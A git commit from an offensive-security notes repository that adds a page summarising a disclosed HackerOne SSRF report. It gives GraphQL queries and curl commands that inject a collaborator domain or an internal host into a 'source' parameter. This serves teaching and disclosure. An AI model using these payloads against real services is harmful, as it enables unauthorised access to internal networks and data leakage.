STRLCPY/Cipherops

GITBOOK-28: change request with no subject merged in GitBook
Adwaith committed with gitbook-bot 1 year ago

2de5b9dc

1 parent 4edbbfa0

■ ■ ■ ■ ■ ■

SUMMARY.md

		skipped 40 lines
41	41		* [Insecure Direct Object References, Open Redirect, Request Smuggling](exploitation/insecure-direct-object-references-open-redirect-request-smuggling.md)
42	42		* [Introducing 20 web-application hacking tools🔥🤩🌵](web-application/introducing-20-web-application-hacking-tools.md)
43	43		* [Disclosed Reports 📝](web-application/disclosed-reports.md)
	44	+	* [🤯 SSRF From Hackerone](web-application/ssrf-from-hackerone.md)
44	45
45	46		## 🐦 Twitter Threads
46	47
		skipped 37 lines

■ ■ ■ ■ ■ ■

web-application/ssrf-from-hackerone.md

1	+	---
2	+	description: 'Ref: https://hackerone.com/reports/1864188'
3	+	---
4	+
5	+	# 🤯 SSRF From Hackerone
6	+
7	+	Understanding SSRF Vulnerabilities and Their Impact
8	+
9	+	Server-Side Request Forgery (SSRF) is a critical security vulnerability that allows attackers to send unauthorized requests from the server to other internal or external resources. In this article, we will analyze some examples of SSRF queries and curl commands to better comprehend the severity of this issue.
10	+
11	+	#### SSRF Request with GraphQL Query Parameter
12	+
13	+	```json
14	+	query {
15	+	allTicks(symbol:"TSLA", source:"https://[COLLABORATOR_DOMAIN]/") {
16	+	symbol
17	+	server
18	+	source
19	+	ask
20	+	time
21	+	bid
22	+	}
23	+	}
24	+	```
25	+
26	+	```bash
27	+	curl -v "https://xxxx.xxx.com/" -H "Content-Type: application/json" --data '{"query":"query { allTicks(symbol:\"TSLA\", source:\"https://[COLLABORATOR_DOMAIN]/\"){ symbol server source ask time bid } }"}'
28	+	```
29	+
30	+	In this example, the GraphQL query contains a vulnerable parameter `source` that accepts a URL. An attacker can manipulate this URL to make the server send a request to their controlled domain, referred to as `[COLLABORATOR_DOMAIN]`, potentially leading to data leakage or unauthorized access.
31	+
32	+	#### SSRF Request with GET Parameters inside GraphQL JSON
33	+
34	+	```json
35	+	query {
36	+	allTicks(symbol:"TSLA", source:"https://[COLLABORATOR_DOMAIN]/?do=something&") {
37	+	symbol
38	+	server
39	+	source
40	+	ask
41	+	time
42	+	bid
43	+	}
44	+	}
45	+	```
46	+
47	+	```bash
48	+	curl -v "https://xxxx.xx.com/" -H "Content-Type: application/json" --data '{"query":"query { allTicks(symbol:\"TSLA\", source:\"https://[COLLABORATOR_DOMAIN]//?do=something&\"){ symbol server source ask time bid } }"}'
49	+	```
50	+
51	+	Here, the GraphQL query includes GET parameters in the URL. An attacker can exploit this by modifying the parameters and potentially impacting the behavior of the server, leading to various security risks.
52	+
53	+	#### SSRF Request to Internal Host
54	+
55	+	```json
56	+	query {
57	+	allTicks(symbol:"TSLA", source:"https://█████/?") {
58	+	symbol
59	+	server
60	+	source
61	+	ask
62	+	time
63	+	bid
64	+	}
65	+	}
66	+	```
67	+
68	+	```bash
69	+	curl -v "https://xxxx.xxx.com/" -H "Content-Type: application/json" --data '{"query":"query { allTicks(symbol:\"TSLA\", source:\"https://https://████/?\"){ symbol server source ask time bid } }"}'
70	+	```
71	+
72	+	In this instance, the GraphQL query includes a modified URL with the placeholder `█████`, suggesting an attempt to perform an SSRF request to an internal host. If successful, this could expose sensitive information or services running on the internal network.
73	+
74	+	#### Conclusion
75	+
76	+	SSRF vulnerabilities are serious threats that require immediate attention from developers and security teams. To mitigate SSRF risks, it is essential to validate and sanitize user-provided URLs and limit access to sensitive internal resources.
77	+
78	+	Remember, proactive security measures and regular vulnerability assessments are crucial in maintaining a robust and secure web application. Stay vigilant, and always prioritize cybersecurity to protect both your users and your organization.
79	+
80	+	***
81	+

GITBOOK-28: change request with no subject merged in GitBook